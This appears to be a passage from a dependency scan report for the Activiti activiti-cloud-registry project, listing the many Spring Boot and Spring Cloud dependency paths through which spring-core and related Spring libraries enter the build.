  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
